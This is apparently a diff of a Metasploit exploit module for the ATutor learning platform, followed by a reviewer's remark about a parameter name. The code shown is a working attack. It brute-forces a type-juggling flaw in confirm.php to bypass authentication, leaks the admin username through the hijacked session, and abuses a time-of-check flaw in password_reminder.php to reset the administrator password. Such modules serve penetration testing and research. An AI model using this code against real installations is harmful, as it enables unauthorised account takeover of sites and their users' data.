modules/exploits/linux/http/atutor_filemanager_traversal.rb

```diff
@@ -0,0 +1,370 @@
+      # we need to set the agent to the same value that was in type_juggle,
+      # since the bypassed session is linked to the user-agent. We can then
+      # use that session to leak the username
+      'agent' => ''
+    })
+    username = "#{$1}" if res.body =~ /<span id="login">(.*)<\/span>/
+    if username
+       return username
+    end
+    # else we fail, because we dont know the username to login as
+    fail_with(Failure::Unknown, "Unable to find the username!")
+  end
+
+  def type_juggle
+    # high padding, means higher success rate
+    # also, we use numbers, so we can count requests :p
+    for i in 1..8
+      for @number in ('0'*i..'9'*i)
+        res = send_request_cgi({
+          'method'   => 'POST',
+          'uri'      => normalize_uri(target_uri.path, "confirm.php"),
+          'vars_post' => {
+            'auto_login' => '',
+            'code' => '0'        # type juggling
+          },
+          'vars_get' => {
+            'e' => @number,      # the bruteforce
+            'id' => '',
+            'm' => '',
+            # the default install script creates a member
+            # so we know for sure, that it will be 1
+            'member_id' => '1'
+          },
+          # need to set the agent, since we are creating x number of sessions
+          # and then using that session to get leak the username
+          'agent' => ''
+        }, redirect_depth = 0)  # to validate a successful bypass
+        if res and res.code == 302
+          cookie = "ATutorID=#{$3};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/
+          return cookie
+        end
+      end
+    end
+    # if we finish the loop and have no sauce, we cant make pasta
+    fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication")
+  end
+
+  def reset_password()
+    # this is due to line 79 of password_reminder.php
+    days = (Time.now.to_i/60/60/24)
+    # make a semi strong password, we have to encourage security now :->
+    pass = Rex::Text.rand_text_alpha(32)
+    hash = Rex::Text.sha1(pass)
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, "password_reminder.php"),
+      'vars_post' => {
+        'form_change' => 'true',
+        # the default install script creates a member
+        # so we know for sure, that it will be 1
+        'id' => '1',
+        'g' => days + 1,                    # needs to be > the number of days since epoch
+        'h' => '',                          # not even checked!
+        'form_password_hidden' => hash,     # remotely reset the password
+        'submit' => 'Submit'
+      },
+    }, redirect_depth = 0)  # to validate a successful bypass
+
+    if res and res.code == 302
+      return pass
+    end
+    # if we land here, the TOCTOU failed us
+    fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password")
+  end
+
+  def login(username, hash, check=false)
```

Comment:
The second parameter should be password rather than hash since each time the password is getting passed to this method.